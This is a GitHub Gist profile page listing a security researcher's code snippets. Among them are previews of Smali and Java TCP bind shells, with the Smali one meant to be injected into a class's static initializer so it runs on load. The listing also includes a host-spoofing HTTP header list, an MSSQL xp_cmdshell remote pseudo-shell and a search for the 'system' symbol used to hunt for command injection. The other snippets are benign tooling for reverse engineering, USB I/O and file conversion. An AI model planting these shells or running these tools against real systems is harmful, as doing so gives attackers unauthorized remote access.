Skip to content

Instantly share code, notes, and snippets.

View SeanPesce's full-sized avatar

Sean Pesce SeanPesce

62 followers · 57 following
View GitHub Profile
@SeanPesce
SeanPesce / BindShellTcp.smali
Last active March 22, 2024 12:54
TCP bind shell (port 7777) written in Smali. Add this to the static initializer code (clinit) of any loaded class to start the listener.
.method static constructor <clinit>()V
.locals 5
invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
move-result-object v0
const/4 v1, 3
new-array v2, v1, [Ljava/lang/String;
@SeanPesce
SeanPesce / BindShellTcp.java
Last active February 28, 2024 22:48
Java TCP bind shell (also compatible with Android)
// Author: Sean Pesce
//
// This bind shell implementation is compatible with both standard Java and the Android SDK.
// By default, it listens in a new thread, on TCP port 45100, and on all network interfaces.
//
// Start the listener with default parameters like so:
// new BindShellTcp().start();
package com.seanpesce.shell;
@SeanPesce
SeanPesce / host_spoof_headers.txt
Last active November 5, 2023 19:35 — forked from kaimi-/gist:6b3c99538dce9e3d29ad647b325007c1
List of potential host-spoofing HTTP headers
CACHE_INFO
CF_CONNECTING_IP
CF-Connecting-IP
CLIENT_IP
Client-IP
COMING_FROM
CONNECT_VIA_IP
FORWARD_FOR
FORWARD-FOR
FORWARDED_FOR_IP
@SeanPesce
SeanPesce / ghidra_concat.h
Last active June 23, 2024 12:45
Ghidra CONCAT Implementations
// Author: Sean Pesce
//
// Manual implementations of the CONCAT operations produced by the Ghidra decompiler.
// These definitions are helpful for compiling re-implementations of native code using
// decompiler output (e.g., with gcc).
//
// Note that these implementations would be outperformed by minimal C preprocessor macros
// that replicate the same logic.
@SeanPesce
SeanPesce / json_utf8_to_ascii.py
Last active September 30, 2022 12:16
Python 3 script to ASCII-encode a JSON file with UTF-8 data
#!/usr/bin/env python3
# Author: Sean Pesce
import json
import sys
def json_convert_utf8_to_ascii_file(in_fpath, out_fpath, include_encoding=False):
b = b''
with open(in_fpath, 'rb') as f:
b = f.read()
@SeanPesce
SeanPesce / usb_util.py
Last active June 17, 2022 16:28
Python 3 classes for USB bulk device I/O
#!/usr/bin/env python3
# Author: Sean Pesce
# Installing prerequisites:
# sudo pip3 install pyusb
#
# On Windows, you also need to install libusb:
# https://sourceforge.net/projects/libusb-win32/files/libusb-win32-releases/
# Then, use inf-wizard.exe to create and install a libusb driver for the device.
# Note: this requires installation of an unsigned driver.
@SeanPesce
SeanPesce / xp_cmdshell.py
Created June 10, 2022 00:04
Interactive pseudo-shell for executing shell commands on a remote MSSQL server via xp_cmdshell
#!/usr/bin/env python3
# Author: Sean Pesce
# This script acts as a pseudo-shell by executing shell commands on a remote MSSQL server instance
# using sqsh and xp_cmdshell.
import argparse
import os
@SeanPesce
SeanPesce / find_symbol.sh
Last active May 10, 2023 19:03
Linux shell command to find binaries that contain a specific symbol. Useful when searching for command injection and other vulnerabilities.
#!/bin/bash
SYMBOL_NAME="system"; find ./ -type f -exec printf "{}: " \; -exec sh -c "objdump -T \"{}\" 2>&1 | grep -e \" $SYMBOL_NAME\" ; echo \"\"" \; | grep -e " $SYMBOL_NAME"
@SeanPesce
SeanPesce / enum_ex.py
Last active March 18, 2022 16:02
Python 3 convenience class for checking if a value is a valid Enum value
#!/usr/bin/env python3
from enum import EnumMeta, Enum
class EnumExMeta(EnumMeta):
def __contains__(self, val):
try:
self(val)
except ValueError:
@SeanPesce
SeanPesce / archive.py
Last active March 18, 2022 16:09
Deus Ex: Mankind Divided (DXMD) .archive file extractor
#!/usr/bin/env python3
# Author: Sean Pesce
"""
The classes in this file can be used to extract files from the *.archive files used by DXMD.
Extraction of files that span multiple archives is also supported.
"""
import logging
import os